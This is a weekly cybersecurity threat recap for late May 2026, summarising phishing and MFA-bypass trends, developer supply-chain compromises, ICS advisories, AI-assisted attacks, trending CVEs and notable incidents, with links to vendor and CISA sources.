Weekly Recap — 2026-05-25 -> 2026-06-01

By the Numbers

• Total articles: 34
• By severity: Critical: 12, High: 17, Informational: 1, Low: 1, Medium: 3
• By category: APT: 2, general security news: 4, malware: 7, phishing/social engineering: 3, vulnerability: 18

Top Threats

Session Hijacking and MFA Bypass at Scale

Adversary-in-the-middle phishing kits and infostealers are rendering traditional MFA ineffective by stealing authenticated session tokens rather than breaking cryptography. Tycoon 2FA proxies login flows to harvest session cookies and register persistent device tokens that survive password resets, while Chinese PhaaS platforms use AI-driven site cloning and real-time OTP interception to drain bank accounts within seconds of credential entry.

• https://www.elastic.co/security-labs/tycoon-2fa-aitm-detection-engineering
• https://cloud.google.com/blog/topics/threat-intelligence/chinese-language-phishing-services/
• https://arcticwolf.com/resources/blog/forticlient-ems-exploited-via-cve-2026-35616-to-deliver-ekz-infostealer-disguised-as-a-fortinet-patch/
• https://www.huntress.com/blog/why-hackers-don't-need-passwords-anymore

Developer Supply Chain Compromise

Threat actors are embedding malicious code in packages, extensions, and CI/CD workflows at an accelerating pace, exploiting the implicit trust developers place in their tooling. Glassworm and Megalodon both weaponized developer environments through trojanized VSCode extensions and poisoned GitHub Actions, while a fraudulent NuGet package exfiltrated banking certificates and Lazarus compromised the axios library with 100M+ weekly downloads — proving that a single supply chain intrusion now cascades across millions of downstream applications.

• https://www.crowdstrike.com/en-us/blog/inside-crowdstrike-takedown-of-a-developer-targeting-botnet/
• https://www.reversinglabs.com/blog/hunting-megalodon-fossils
• https://socket.dev/blog/malicious-nuget-package-impersonates-sicoob-sdk
• https://www.welivesecurity.com/en/eset-research/eset-apt-activity-report-q4-2025-q1-2026/

Critical Infrastructure Vulnerabilities with Hard-Coded Credentials

A flood of critical-severity ICS advisories this week exposed hard-coded passwords and unauthenticated remote code execution flaws across industrial and medical systems. The PUSR USR-W610 converter and Eppendorf BioFlo bioreactor both ship with unchangeable default credentials granting full administrative control, while ABB's B&R Automation Runtime carries a CVSS 10.0 denial-of-service flaw — risks compounded by vendors who are unresponsive to coordination attempts.

• https://www.cisa.gov/news-events/ics-advisories/icsa-26-146-04
• https://www.cisa.gov/news-events/ics-advisories/icsa-26-148-02
• https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-146-01
• https://www.cisa.gov/news-events/ics-advisories/icsa-26-146-05
• https://www.cisa.gov/news-events/ics-advisories/icsa-26-146-06
• https://www.cisa.gov/news-events/ics-advisories/icsa-26-146-01
• https://www.cisa.gov/news-events/ics-advisories/icsa-26-148-03
• https://www.cisa.gov/news-events/ics-advisories/icsa-26-148-07
• https://blog.talosintelligence.com/dicom-pydicom-gdcm-and-orthanc-a-technical-tour-of-what-really-happens-in-the-heap/

AI-Augmented Attack Operations

Generative AI has moved from experimental use to operational deployment across both criminal and state-sponsored campaigns. Russia-aligned GREYVIBE systematically uses LLMs to author malware and fabricate convincing phishing lures, while commercial PhaaS platforms integrate multi-stage AI pipelines for automated site cloning and business email compromise drafting — and AI is compressing the patch window by generating working exploits from advisories within hours of disclosure.

• https://labs.withsecure.com/publications/greyvibe.html
• https://cloud.google.com/blog/topics/threat-intelligence/chinese-language-phishing-services/
• https://research.checkpoint.com/2026/ai-threat-landscape-digest-march-april-2026/

Takedown-Resistant Command and Control Infrastructure

Attackers are engineering C2 channels that resist disruption by leveraging immutable blockchain contracts, decentralized protocols, and legitimate cloud services. ClearFake stores payload routing on BNB Smart Chain testnet smart contracts, Glassworm used Solana blockchain memos alongside BitTorrent DHT and Google Calendar events, and piracy-themed malware employs DNS tunneling with domain generation algorithms — rendering traditional domain-blocking defenses increasingly ineffective.

• https://www.trendmicro.com/en_us/research/26/e/smart-contracts-for-command-and-control.html
• https://www.crowdstrike.com/en-us/blog/inside-crowdstrike-takedown-of-a-developer-targeting-botnet/
• https://securelist.com/video-books-pirates-miners-rat/119943/

Trending CVEs

• CVE-2026-35616 (1 mentions) — FortiClient EMS vulnerability actively exploited in the wild to deliver EKZ Infostealer disguised as a Fortinet patch via trusted management channels Sources: 1
• CVE-2026-0257 (1 mentions) — Palo Alto Networks PAN-OS authentication bypass added to CISA KEV catalog due to active exploitation in the wild Sources: 1
• CVE-2026-5426 (1 mentions) — Critical ViewState deserialization RCE in KnowledgeDeliver LMS using hardcoded ASP.NET machine keys, enabling BLUEBEAM web shell deployment and Cobalt Strike BEACON delivery Sources: 1
• CVE-2025-3450 (1 mentions) — CVSS 10.0 improper resource locking vulnerability in ABB B&R Automation Runtime SDM allowing unauthenticated remote attackers to cause complete denial-of-service Sources: 1
• CVE-2026-7786 (1 mentions) — Critical hard-coded plaintext administrative credentials in PUSR USR-W610 converter firmware with no available patch; vendor unresponsive to CISA coordination Sources: 1
• CVE-2026-7251 (1 mentions) — Critical hard-coded VNC password in Eppendorf BioFlo 320 bioreactors allowing unauthenticated remote control of medical/research equipment Sources: 1
• CVE-2026-45659 (1 mentions) — Critical Microsoft SharePoint remote code execution vulnerability requiring out-of-band patch; GitHub Enterprise Server customers must also rotate public keys Sources: 1
• CVE-2026-41940 (1 mentions) — cPanel CRLF injection vulnerability exploited in the Megalodon campaign to gain root access and deploy XMR cryptominers via Docker Sources: 1

Sector Trends

• Critical Infrastructure and OT — Industrial control systems face compounding risk from hard-coded credentials and unpatchable devices. ABB alone issued advisories across five product lines, the PUSR USR-W610 ships with plaintext admin passwords and no available patch, and the Eppendorf BioFlo bioreactor contains an unchangeable VNC password — while nation-state actors like Sandworm and CyberAv3ngers actively target energy and water infrastructure in NATO states. Sources: 1, 2, 3, 4, 5
• Financial Services — Chinese-language PhaaS platforms are heavily targeting Japanese consumers with real-time OTP interception and digital wallet provisioning, while a malicious NuGet package exfiltrated Brazilian banking certificates and payment data from developers — indicating that financial sector attacks increasingly originate through compromised developer tooling rather than direct network intrusion. Sources: 1, 2
• Sports and Mega Events — The 2026 World Cup's distributed multi-city infrastructure creates a vast attack surface facing Iran-aligned OT attackers targeting exposed PLCs, Russia-aligned hacktivists launching DDoS campaigns, and financially motivated ransomware operators targeting hospitality and ticketing systems. Sources: 1

Notable Incidents

• CrowdStrike disrupts Glassworm developer-targeting botnet — Joint takedown with Google and Shadowserver severed four resilient C2 channels using Solana blockchain memos, BitTorrent DHT, Google Calendar, and direct VPS connections; infected machines now beacon to sinkhole IP 164.92.88.210 as a high-fidelity IOC
• FortiClient EMS exploited to deliver EKZ Infostealer disguised as Fortinet patch — Attackers weaponized trusted endpoint management channels to push malware disguised as a legitimate Fortinet update, and the stealer bypasses Chromium's AES-256 master key encryption
• Lazarus compromises axios npm library with 100M+ weekly downloads — North Korean actors stole maintainer credentials to inject trojanized code into one of the most widely used JavaScript libraries, demonstrating the catastrophic blast radius of single-package supply chain attacks
• The Gentlemen ransomware emerges with aggressive self-propagation — Go-based Ransomware-as-a-Service operated by Storm-2697 combines Curve25519/XChaCha20 hybrid encryption with redundant lateral movement via PsExec, WMI, scheduled tasks, services, and PowerShell remoting
• CISA adds PAN-OS authentication bypass to KEV catalog — Active exploitation of a Palo Alto Networks PAN-OS authentication bypass forces mandatory remediation for federal agencies and signals urgent risk for any organization with exposed firewall management interfaces